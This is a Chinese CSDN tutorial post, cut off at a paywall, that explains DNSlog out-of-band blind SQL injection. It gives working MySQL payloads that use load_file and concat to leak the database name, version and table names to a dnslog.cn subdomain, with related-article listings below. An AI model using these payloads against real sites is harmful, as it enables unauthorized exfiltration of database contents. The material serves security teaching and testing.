84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]

最新推荐文章于 2024-06-04 12:07:31 发布
最新推荐文章于 2024-06-04 12:07:31 发布
阅读量4.3k 收藏 12
点赞数 2
分类专栏: # 1.网络安全渗透测试-[持续更新] 文章标签: dnslog无回显注入 MySQL-dnslog注入 MSSQL-dnslog注入 MySQL dnslog注入 dnslog注入实战
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/122629565
版权
本文深入探讨了DNSLog无回显注入的高级技巧,包括原理、免费DNSLog平台的使用,以及在MySQL和SQLSERVER中的示例。通过利用DNS解析日志,可以高效地获取数据库信息,文中详细阐述了不同场景下的payload构造。
摘要由CSDN通过智能技术生成

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

一、高级注入技巧 dnslog无回显注入

1、原理

       DNS在解析的时候会留下日志,利用这个属性,可以读取多级域名的解析日志,来获取信息。

       如果将带有查询的语句,发起dns查询请求,通过dns请求查询到值,组合成三级域名,在dns服务器dns的日志中会记录下我们查询的结果。

       无回显注入,一般使用布尔型盲注入和延时注入来逐个猜解数据的字符,但是这两种查询都是很慢。然而dnslog外带查询,因为是直接显示数据,所以这种注入效率上面说的这种都要好太多。

2、dnslog平台

(1)免费的dnslog平台:传送门
在这里插入图片描述

3、MySQL dnslog无回显注入示例:

(1)靶机注入点:target_sys.com/article.php?id=1

(2)查询库当前库-payload1:?id=1 and if((select load_file(concat('\\\\',(select database()),'.vwmh1y.dnslog.cn\\abc'))),1,0)
  # 使用load_file()这个函数,必须要在mysql开启secure_file_prv=
  # 其中【select database()】是我们的注入语句
  # 其中【vwmh1y.dnslog.cn】,是我们之前得到的子域名
在这里插入图片描述

(3)查询数据版本-payload2:?id=1 and if((select load_file(concat('\\\\',(select VERSION()),'.vwmh1y.dnslog.cn\\abc'))),1,0)
  # 使用load_file()这个函数,必须要在mysql开启secure_file_prv=
  # 其中【select version()】是我们的注入语句
  # 其中【vwmh1y.dnslog.cn】,是我们之前得到的子域名

在这里插入图片描述
(4)查询当前库的第一个表名-payload3:?id=1 and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.wdykxm.dnslog.cn\\abc'))),1,0)
  # 使用load_file()这个函数,必须要在mysql开启secure_file_prv=
  # 其中【select username from admin】是我们的注入语句
  # 其中【wdykxm.dnslog.cn】,是我们之前得到的子域名
在这里插入图片描述

(5)查询admin表的帐号-payload4:?id

最低0.47元/天 解锁文章
qwsn
关注
专栏目录
26-3 SQL注入攻击 - SQL注入回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 616
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
巧用DNSlog实现无回显注入
weixin_30335575的博客
12-16 1103
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Serv...
SQL注入回显利用DNSlog构造方式
m0_62207482的博客
03-17 470
防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
mysql注入回显_利用DNSLog实现无回显注入
weixin_31766003的博客
01-28 1788
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSLOG的原理DNS的解析是递归与迭代相结合的,下面给出了当我们访问其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DN...
利用 DNSLog回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 692
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3102
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Sql注入漏洞汇总-上
最新发布
黑战士的博客
06-04 723
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 190
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
sql注入,布尔盲注和时间盲注,无回显
weixin_71008408的博客
01-31 579
这行代码的意思是 截取数据库中第一个字段的长度,并转换为asc码与100比较,我们知道我们数据库名 security ,第一个是s,通过asc码转换值应为115,所以符合,大家可以更改比较数值,去尝试查看超过115,会不会错误不显示。通过order by分组可以看到,如果正确会i显示you are in,错误则无任何提示,由此可以判断出,目前只显示对错,此外前端不会显示任何数据。但是数据库名,表名,列名每个至少有6,7个字母,挨个猜效率肯定很低,所以python启动!
MYSQL高级注入教程
04-03
pczygx PC资源共享 MYSQL 高级注入 教程 渗透教程 第一课 MYSQL基础教学I 第二课 MYSQL基础教学II 第三课 MYSQL基础教学III 第四课 手工注入-联合查询 第五课 手工注入-MYSQL5.0暴库 第六课 手工注入-MYSQL注入高级技巧
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header) 数据查询API
mysql 高级注入_高级sql注入for mysql
weixin_32944341的博客
01-19 251
一片老文章!高级SQL注入FOR mysql前言我的《SQL Injection with MySQL》(《***防线》7月的专题)已经对MySQL注入有了比较全面的介绍了,但是有一个危害相当大的函数,我并没有在文中提及,因为如果能灵活应用这个函数,那PHP甚至服务器的安全性均会大打折扣,由于《SQL Injection with MySQL》的发表时间是在暑假期间,考虑到很多新手、学生和品德败...
sql注入回显应用情况
weixin_74182283的博客
04-08 1173
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
Sqli-labs 高级注入 (Less23~38)
angry_program的博客
02-02 1181
目录 前言 Less-23 过滤注释的显错注入 Less-24 二次注入 Less-25 过滤and和or的显错注入 Less-26 过滤空格和注释符的显错注入 一、空格绕过注入 二、extracvalue函数的显错注入 三、布尔盲注 Less-26a 过滤空格、注释符的布尔盲注 Less-27 过滤联合查询关键字的显错注入 Less-27a 过滤联合查询关键字...
利用DNSLOG注入突破无回显盲注
SheXinK’s Blog
12-19 1014
利用DNSLOG注入突破无回显盲注1、 SQL注入介绍2、 盲注PHP代码3、 DNSLOG注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 盲注PHP代码   新建PHP文件,将下面代码复制到PHP文...
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7728
SQL注入-无回显
DVWA环境里,普通SQL注入没错误回显原因
qq_43309162的博客
02-24 1598
DVWA环境里,普通SQL注入没错误回显的原因,即使不是盲注也没有回显,心态崩了啊。
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 371
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值